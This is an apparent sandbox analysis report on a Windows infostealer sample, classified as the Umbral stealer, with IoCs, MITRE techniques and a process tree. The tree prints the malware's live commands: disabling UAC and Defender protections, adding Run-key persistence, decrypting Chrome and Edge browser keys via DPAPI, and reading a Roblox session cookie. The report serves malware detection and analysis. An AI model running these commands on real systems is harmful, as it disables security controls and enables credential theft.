umbral | be1584009cafff5d8f18674e6d2ea65085af54d372536c3dff3808c3bcdec576

Analysis

max time kernel
93s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 12:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OblivionClient - Loader.exe
Size

40.8MB
MD5

2b44034e50129f5147fdf24ecff3c206
SHA1

05ecb9594f74a0f567072fba224f07ebcfb524fa
SHA256

be1584009cafff5d8f18674e6d2ea65085af54d372536c3dff3808c3bcdec576
SHA512

212276778f9ad9f2ac08c5ff329880a068d1f0f1fc24474bab37e81e676fd4cf9bb0ae2ff68552997afb2e9ebd19c0e192526fa2c156ffb1e0d30dc168339cf5
SSDEEP

786432:LyQZMFClCtlII/CnlxrH4T4Vu862kpkKOWck7UazNyF3S6ghQbhEhNLBsEzP:LyQZkVlII/CnlxrH4J862kpkq/pzoahj

Score

10^/10

umbral defense_evasion discovery evasion execution persistence spyware stealer trojan

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000400000001e4e1-19.dat	family_umbral
behavioral2/memory/3640-28-0x000001D6B1840000-0x000001D6B1880000-memory.dmp	family_umbral

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
720	powershell.exe
4352	powershell.exe
1252	powershell.exe
3952	powershell.exe
2260	powershell.exe
4384	powershell.exe
3400	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	wininit.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	csrss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	OblivionClient - Loader.exe

Executes dropped EXE 5 IoCs

pid	Process
2760	csrss.exe
3640	wininit.exe
4836	OblivionLoader.exe
3876	python-installer.exe
2532	python-installer.exe

Loads dropped DLL 2 IoCs

pid	Process
2760	csrss.exe
2532	python-installer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "C:\\ProgramData\\Update.vbs"	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	discord.com
24	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
884	cmd.exe
1804	cmd.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\fRPh8UgKjX.txt	csrss.exe
File opened for modification	C:\Windows\System32\fRPh8UgKjX.txt	csrss.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2868	tasklist.exe
764	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OblivionClient - Loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4400	PING.EXE
2212	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4724	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4400	PING.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
2544	powershell.exe
2544	powershell.exe
3952	powershell.exe
3952	powershell.exe
3640	wininit.exe
720	powershell.exe
720	powershell.exe
4384	powershell.exe
4384	powershell.exe
452	powershell.exe
452	powershell.exe
3400	powershell.exe
3400	powershell.exe
528	powershell.exe
528	powershell.exe
5108	powershell.exe
5108	powershell.exe
4352	powershell.exe
4352	powershell.exe
1252	powershell.exe
1252	powershell.exe
2260	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	3640	wininit.exe
Token: SeIncreaseQuotaPrivilege	2904	wmic.exe
Token: SeSecurityPrivilege	2904	wmic.exe
Token: SeTakeOwnershipPrivilege	2904	wmic.exe
Token: SeLoadDriverPrivilege	2904	wmic.exe
Token: SeSystemProfilePrivilege	2904	wmic.exe
Token: SeSystemtimePrivilege	2904	wmic.exe
Token: SeProfSingleProcessPrivilege	2904	wmic.exe
Token: SeIncBasePriorityPrivilege	2904	wmic.exe
Token: SeCreatePagefilePrivilege	2904	wmic.exe
Token: SeBackupPrivilege	2904	wmic.exe
Token: SeRestorePrivilege	2904	wmic.exe
Token: SeShutdownPrivilege	2904	wmic.exe
Token: SeDebugPrivilege	2904	wmic.exe
Token: SeSystemEnvironmentPrivilege	2904	wmic.exe
Token: SeRemoteShutdownPrivilege	2904	wmic.exe
Token: SeUndockPrivilege	2904	wmic.exe
Token: SeManageVolumePrivilege	2904	wmic.exe
Token: 33	2904	wmic.exe
Token: 34	2904	wmic.exe
Token: 35	2904	wmic.exe
Token: 36	2904	wmic.exe
Token: SeIncreaseQuotaPrivilege	2904	wmic.exe
Token: SeSecurityPrivilege	2904	wmic.exe
Token: SeTakeOwnershipPrivilege	2904	wmic.exe
Token: SeLoadDriverPrivilege	2904	wmic.exe
Token: SeSystemProfilePrivilege	2904	wmic.exe
Token: SeSystemtimePrivilege	2904	wmic.exe
Token: SeProfSingleProcessPrivilege	2904	wmic.exe
Token: SeIncBasePriorityPrivilege	2904	wmic.exe
Token: SeCreatePagefilePrivilege	2904	wmic.exe
Token: SeBackupPrivilege	2904	wmic.exe
Token: SeRestorePrivilege	2904	wmic.exe
Token: SeShutdownPrivilege	2904	wmic.exe
Token: SeDebugPrivilege	2904	wmic.exe
Token: SeSystemEnvironmentPrivilege	2904	wmic.exe
Token: SeRemoteShutdownPrivilege	2904	wmic.exe
Token: SeUndockPrivilege	2904	wmic.exe
Token: SeManageVolumePrivilege	2904	wmic.exe
Token: 33	2904	wmic.exe
Token: 34	2904	wmic.exe
Token: 35	2904	wmic.exe
Token: 36	2904	wmic.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	720	powershell.exe
Token: SeIncreaseQuotaPrivilege	184	WMIC.exe
Token: SeSecurityPrivilege	184	WMIC.exe
Token: SeTakeOwnershipPrivilege	184	WMIC.exe
Token: SeLoadDriverPrivilege	184	WMIC.exe
Token: SeSystemProfilePrivilege	184	WMIC.exe
Token: SeSystemtimePrivilege	184	WMIC.exe
Token: SeProfSingleProcessPrivilege	184	WMIC.exe
Token: SeIncBasePriorityPrivilege	184	WMIC.exe
Token: SeCreatePagefilePrivilege	184	WMIC.exe
Token: SeBackupPrivilege	184	WMIC.exe
Token: SeRestorePrivilege	184	WMIC.exe
Token: SeShutdownPrivilege	184	WMIC.exe
Token: SeDebugPrivilege	184	WMIC.exe
Token: SeSystemEnvironmentPrivilege	184	WMIC.exe
Token: SeRemoteShutdownPrivilege	184	WMIC.exe
Token: SeUndockPrivilege	184	WMIC.exe
Token: SeManageVolumePrivilege	184	WMIC.exe
Token: 33	184	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1156 wrote to memory of 2544	1156	OblivionClient - Loader.exe	85
PID 1156 wrote to memory of 2544	1156	OblivionClient - Loader.exe	85
PID 1156 wrote to memory of 2544	1156	OblivionClient - Loader.exe	85
PID 1156 wrote to memory of 2760	1156	OblivionClient - Loader.exe	87
PID 1156 wrote to memory of 2760	1156	OblivionClient - Loader.exe	87
PID 1156 wrote to memory of 3640	1156	OblivionClient - Loader.exe	89
PID 1156 wrote to memory of 3640	1156	OblivionClient - Loader.exe	89
PID 1156 wrote to memory of 4836	1156	OblivionClient - Loader.exe	90
PID 1156 wrote to memory of 4836	1156	OblivionClient - Loader.exe	90
PID 3640 wrote to memory of 2904	3640	wininit.exe	91
PID 3640 wrote to memory of 2904	3640	wininit.exe	91
PID 2760 wrote to memory of 3120	2760	csrss.exe	94
PID 2760 wrote to memory of 3120	2760	csrss.exe	94
PID 3120 wrote to memory of 3952	3120	cmd.exe	95
PID 3120 wrote to memory of 3952	3120	cmd.exe	95
PID 3640 wrote to memory of 3956	3640	wininit.exe	97
PID 3640 wrote to memory of 3956	3640	wininit.exe	97
PID 3952 wrote to memory of 4400	3952	powershell.exe	160
PID 3952 wrote to memory of 4400	3952	powershell.exe	160
PID 3640 wrote to memory of 720	3640	wininit.exe	99
PID 3640 wrote to memory of 720	3640	wininit.exe	99
PID 4400 wrote to memory of 3876	4400	csc.exe	165
PID 4400 wrote to memory of 3876	4400	csc.exe	165
PID 2760 wrote to memory of 4220	2760	csrss.exe	102
PID 2760 wrote to memory of 4220	2760	csrss.exe	102
PID 4220 wrote to memory of 184	4220	cmd.exe	103
PID 4220 wrote to memory of 184	4220	cmd.exe	103
PID 2760 wrote to memory of 3692	2760	csrss.exe	104
PID 2760 wrote to memory of 3692	2760	csrss.exe	104
PID 3692 wrote to memory of 2868	3692	cmd.exe	105
PID 3692 wrote to memory of 2868	3692	cmd.exe	105
PID 3640 wrote to memory of 4384	3640	wininit.exe	106
PID 3640 wrote to memory of 4384	3640	wininit.exe	106
PID 2760 wrote to memory of 1632	2760	csrss.exe	108
PID 2760 wrote to memory of 1632	2760	csrss.exe	108
PID 2760 wrote to memory of 884	2760	csrss.exe	169
PID 2760 wrote to memory of 884	2760	csrss.exe	169
PID 1632 wrote to memory of 764	1632	cmd.exe	110
PID 1632 wrote to memory of 764	1632	cmd.exe	110
PID 884 wrote to memory of 452	884	cmd.exe	145
PID 884 wrote to memory of 452	884	cmd.exe	145
PID 3640 wrote to memory of 3400	3640	wininit.exe	112
PID 3640 wrote to memory of 3400	3640	wininit.exe	112
PID 2760 wrote to memory of 1804	2760	csrss.exe	114
PID 2760 wrote to memory of 1804	2760	csrss.exe	114
PID 1804 wrote to memory of 528	1804	cmd.exe	115
PID 1804 wrote to memory of 528	1804	cmd.exe	115
PID 3640 wrote to memory of 5108	3640	wininit.exe	116
PID 3640 wrote to memory of 5108	3640	wininit.exe	116
PID 2760 wrote to memory of 1572	2760	csrss.exe	118
PID 2760 wrote to memory of 1572	2760	csrss.exe	118
PID 1572 wrote to memory of 2212	1572	cmd.exe	158
PID 1572 wrote to memory of 2212	1572	cmd.exe	158
PID 2760 wrote to memory of 3876	2760	csrss.exe	165
PID 2760 wrote to memory of 3876	2760	csrss.exe	165
PID 2760 wrote to memory of 4000	2760	csrss.exe	121
PID 2760 wrote to memory of 4000	2760	csrss.exe	121
PID 2760 wrote to memory of 4480	2760	csrss.exe	122
PID 2760 wrote to memory of 4480	2760	csrss.exe	122
PID 3876 wrote to memory of 4916	3876	cmd.exe	123
PID 3876 wrote to memory of 4916	3876	cmd.exe	123
PID 4480 wrote to memory of 4352	4480	cmd.exe	124
PID 4480 wrote to memory of 4352	4480	cmd.exe	124
PID 4000 wrote to memory of 636	4000	cmd.exe	125

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3956	attrib.exe

C:\Users\Admin\AppData\Local\Temp\OblivionClient - Loader.exe
"C:\Users\Admin\AppData\Local\Temp\OblivionClient - Loader.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1156
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcABzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbgBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAeABuACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2544
- C:\Users\Admin\AppData\Local\Temp\csrss.exe
  "C:\Users\Admin\AppData\Local\Temp\csrss.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\gbZtWAPgko.ps1""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\gbZtWAPgko.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3952
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rfxky5tc\rfxky5tc.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4400
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD30F.tmp" "c:\Users\Admin\AppData\Local\Temp\rfxky5tc\CSCAF8DB2E5203B4EAE84DDA1B723F9BEE1.TMP"
        6⤵
        
        PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3692
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,102,177,26,43,73,185,195,101,239,243,122,245,189,107,81,67,109,36,10,245,44,7,143,160,99,50,199,20,232,248,239,112,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,81,53,127,36,12,255,68,164,74,21,40,19,231,93,77,7,67,211,67,189,8,25,249,240,180,190,135,68,159,235,108,231,48,0,0,0,110,12,170,120,60,160,102,44,248,179,89,135,191,252,92,211,41,133,68,81,119,82,12,222,65,14,237,166,37,195,106,134,14,140,4,194,106,12,97,164,25,42,143,201,126,254,170,111,64,0,0,0,0,143,165,211,0,232,0,127,166,172,145,237,17,3,253,181,202,253,158,162,85,109,8,12,163,172,115,228,110,209,42,1,142,44,117,188,9,160,177,187,41,146,67,152,183,219,241,243,246,109,118,178,216,53,81,14,251,202,53,212,44,16,33,178), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,102,177,26,43,73,185,195,101,239,243,122,245,189,107,81,67,109,36,10,245,44,7,143,160,99,50,199,20,232,248,239,112,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,81,53,127,36,12,255,68,164,74,21,40,19,231,93,77,7,67,211,67,189,8,25,249,240,180,190,135,68,159,235,108,231,48,0,0,0,110,12,170,120,60,160,102,44,248,179,89,135,191,252,92,211,41,133,68,81,119,82,12,222,65,14,237,166,37,195,106,134,14,140,4,194,106,12,97,164,25,42,143,201,126,254,170,111,64,0,0,0,0,143,165,211,0,232,0,127,166,172,145,237,17,3,253,181,202,253,158,162,85,109,8,12,163,172,115,228,110,209,42,1,142,44,117,188,9,160,177,187,41,146,67,152,183,219,241,243,246,109,118,178,216,53,81,14,251,202,53,212,44,16,33,178), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,39,19,78,149,121,181,167,81,239,194,103,77,198,156,120,120,247,244,202,176,184,17,85,78,59,29,198,219,203,238,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,248,92,249,62,65,149,47,110,21,60,135,79,23,18,163,12,246,10,137,162,169,189,202,100,39,223,20,63,21,24,161,172,48,0,0,0,249,173,150,250,152,87,128,153,68,12,45,90,198,220,55,13,229,172,194,125,99,137,154,246,125,111,102,149,130,197,190,75,97,25,48,229,182,44,61,253,104,51,16,85,226,74,180,64,64,0,0,0,89,143,140,204,74,133,97,128,122,74,214,182,127,253,212,206,252,236,41,180,158,50,83,61,13,166,174,194,98,210,159,38,136,5,230,100,124,36,185,112,221,96,155,39,22,224,93,103,110,214,106,123,88,204,153,62,232,35,54,206,75,247,4,34), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID:1804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,39,19,78,149,121,181,167,81,239,194,103,77,198,156,120,120,247,244,202,176,184,17,85,78,59,29,198,219,203,238,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,248,92,249,62,65,149,47,110,21,60,135,79,23,18,163,12,246,10,137,162,169,189,202,100,39,223,20,63,21,24,161,172,48,0,0,0,249,173,150,250,152,87,128,153,68,12,45,90,198,220,55,13,229,172,194,125,99,137,154,246,125,111,102,149,130,197,190,75,97,25,48,229,182,44,61,253,104,51,16,85,226,74,180,64,64,0,0,0,89,143,140,204,74,133,97,128,122,74,214,182,127,253,212,206,252,236,41,180,158,50,83,61,13,166,174,194,98,210,159,38,136,5,230,100,124,36,185,112,221,96,155,39,22,224,93,103,110,214,106,123,88,204,153,62,232,35,54,206,75,247,4,34), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v csrss /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v csrss /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
      4⤵
      Adds Run key to start application
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.MxvcJkU3Lh""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.MxvcJkU3Lh"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
    3⤵
    PID:552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:3476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:1996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
    3⤵
    PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    3⤵
    PID:1764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_computersystemproduct get uuid
      4⤵
      PID:3920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
    3⤵
    PID:3968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Description,PNPDeviceID
      4⤵
      PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
    3⤵
    PID:4936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get serialnumber
      4⤵
      PID:648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:3564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
    3⤵
    PID:452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get processorid
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
    3⤵
    PID:3480
  - - C:\Windows\system32\getmac.exe
      getmac /NH
      4⤵
      PID:3540
- - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
    C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3876
  - - C:\Windows\Temp\{53794AB2-5A0F-4D01-A7AB-09BB79E86D7A}\.cr\python-installer.exe
      "C:\Windows\Temp\{53794AB2-5A0F-4D01-A7AB-09BB79E86D7A}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=516 -burn.filehandle.self=548 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
    3⤵
    PID:1764
- C:\Users\Admin\AppData\Local\Temp\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3640
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2904
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
    3⤵
    - Views/modifies file attributes
    PID:3956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wininit.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3400
